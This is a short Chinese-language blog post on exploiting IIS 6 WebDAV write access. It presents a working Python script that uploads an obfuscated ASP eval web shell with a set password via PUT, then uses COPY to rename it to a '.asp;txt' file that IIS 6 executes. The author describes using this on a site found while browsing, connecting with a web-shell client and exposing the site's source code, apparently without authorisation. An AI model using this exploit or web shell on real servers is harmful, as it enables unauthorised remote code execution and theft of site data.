Microsoft IIS WebDAV Write Access Code Execution

Last updated on 2 years ago

某天,在网上逛了逛发现了个iis 6站,http所有方法都开了。古老的iis6,存在文件解析漏洞。So。。。。。

使用py脚本进行put一个shell的txt文件,然后copy成.asp;txt尾缀的新文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import urllib2
def iisput():
	url="http://example.com/q.txt"
    # passwd:z
	data='<%Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>'
	req=urllib2.Request(url,data)
	req.get_method=lambda:'PUT'
	req=urllib2.urlopen(req)

def iiswrite():
	url="http://example.com/q.txt"
	req=urllib2.Request(url)
	req.get_method=lambda:'COPY'
	req.add_header('Destination', 'http://example.com/q.asp;txt')
	req=urllib2.urlopen(req)

if __name__ == '__main__':
	iisput()
	print "Txt file put successfully"
	iiswrite()
	print "Copy txt to asp successfully"

菜刀连接,整站源码直接暴露出来了。

查看当前连接情况,发现已经沦落为跑马场了,所有没什么可玩的了。

技术水文
#Web
Microsoft IIS WebDAV Write Access Code Execution
https://guosec.online/posts/6b5b56c.html
Posted on
April 4, 2019
Updated on
February 24, 2022
Licensed under
本博客所有文章除特别声明外,均采用  协议,转载请注明出处!